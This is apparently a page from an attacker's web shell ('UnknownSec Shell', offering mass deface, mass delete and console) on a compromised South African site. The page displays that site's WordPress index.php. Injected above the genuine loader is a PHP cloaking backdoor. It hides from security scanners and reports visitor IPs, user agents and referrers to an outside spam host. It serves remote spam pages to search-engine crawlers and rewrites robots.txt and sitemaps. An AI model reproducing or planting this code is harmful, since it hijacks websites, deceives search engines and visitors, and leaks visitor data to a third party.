shell bypass 403
UnknownSec Shell
:
/
proc
/
self
/
root
/
home
/
innovagencyco
/
public_html
/
sibu2.innovagency.co.za
/ [
drwxr-x---
]
upload
mass deface
mass delete
console
info server
name :
index.php
<?php $bagent = "Docomo|Yahoo|Bing|Google"; $vxjbh = "cw772"; error_reporting(0); if(preg_match("/(heritrix|Python-requests|AskTbFXTV|OBot|LightDeckReports Bot|Python|ezooms|amazonBot|Java|Swiftbot|UniversalFeedParser|mj12bot|python-urllib|ahrefsBot|CoolpadWebkit|yandexBot|Scrapy|feedly|JikeSpider|barkrowler|Indy Library|Jaunty|HttpClient|YisouSpider|CrawlDaddy|SemrushBot|apacheBench|digExt|FeedDemon|Paloaltonetworks|PetalBot|EasouSpider|YySpider|Bytespider|zmEu)/i", $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 403 Forbidden'); exit(); } $kiqfr = "http://".$vxjbh. ".lesbiantown.shop/"; $pc = "VwABWAH"; $uagent = urlencode($_SERVER['HTTP_USER_AGENT']); $refer = urlencode(@$_SERVER['HTTP_REFERER']); $language = urlencode(@$_SERVER['HTTP_ACCEPT_LANGUAGE']); $ip = $_SERVER['REMOTE_ADDR']; if (!empty(@$_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP']; } elseif (!empty(@$_SERVER['HTTP_X_FORWARDED_FOR'])) { $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; } $ip = urlencode($ip); $domain = urlencode($_SERVER['HTTP_HOST']); $script = urlencode($_SERVER['SCRIPT_NAME']); if ( (! empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (! empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (! empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') ) { $_SERVER['REQUEST_SCHEME'] = 'https'; } else { $_SERVER['REQUEST_SCHEME'] = 'http'; } $http = urlencode($_SERVER['REQUEST_SCHEME']); $uri = urlencode($_SERVER['REQUEST_URI']); if(strpos($uri,"vxjvxj") !== false){echo "ok";exit();} $vxj = 0; if(!file_exists("vxj.txt")) { $uuu = $http.'://'.$_SERVER['HTTP_HOST'].'/vxjvxj'; $vlgf = @file_get_contents($uuu); if(empty($vlgf)) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $uuu); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); $vlgf = curl_exec($ch); curl_close($ch); } if($vlgf == "ok") { $vxj = 1; @file_put_contents("vxj.txt","1"); } else { $vxj = 0; @file_put_contents("vxj.txt","0"); } } else { $vxj = @file_get_contents("vxj.txt"); } if(strpos($uri,"favicon.ico") !== false) { } else if(strpos($uri,"pingsitemap.xml") !== false||strpos($uri,"jp2023") !== false||strpos($uri,"robots.txt") !== false||preg_match("@^/(.*?).xml$@i", $_SERVER['REQUEST_URI'])||preg_match("/($bagent)/i", $_SERVER['HTTP_USER_AGENT'])||preg_match("/($bagent)/i", $_SERVER['HTTP_REFERER'])) { $requsturl = $kiqfr."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$vxj&script=$script"; $robots_contents = ""; if(strpos($uri,"pingsitemap.xml") !== false) { $scripname = $_SERVER['SCRIPT_NAME']; if( strpos( $scripname, "index.ph") !== false) { if($vxj == 0) { $scripname = '/?'; } else { $scripname = '/'; } } else { $scripname = $scripname.'?'; } $robots_contents = "User-agent: *\r\nAllow: /"; $sitemap = "$http://" . $domain .$scripname. "sitemap.xml"; $robots_contents = trim($robots_contents)."\r\n"."Sitemap: $sitemap"; $sitemapstatus = ""; echo $sitemap.": ".$sitemapstatus.'<br/>'; $requsturl = $kiqfr."?agent=$uagent&refer=$refer&lang=$language&ip=$ip&dom=$domain&http=$http&uri=$uri&pc=$pc&rewriteable=$vxj&script=$script&sitemap=".urlencode($sitemap); } $vlgf = @file_get_contents($requsturl); if(empty($vlgf)) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $requsturl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); $vlgf = curl_exec($ch); curl_close($ch); } if(!empty($vlgf)) { if($vlgf == "500"||substr($vlgf,0,11)=="error code:") { header("HTTP/1.0 500 Internal Server Error"); exit(); } if(strpos($uri,"jp2023") !== false||preg_match("/($bagent)/i", $_SERVER['HTTP_REFERER'])){header('HTTP/1.1 404 Not Found');} else if(substr($vlgf,0,5)=="<?xml") { header('Content-Type: text/xml; charset=utf-8'); } else { header('Content-Type: text/html; charset=utf-8'); } echo $vlgf; if(!empty($robots_contents)){@file_put_contents("robots.txt",$robots_contents);} else if(strpos($uri,"robots.txt") !== false){@file_put_contents("robots.txt",$vlgf);} exit(); return; } }else{ } ?> <?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';
© 2024 UnknownSec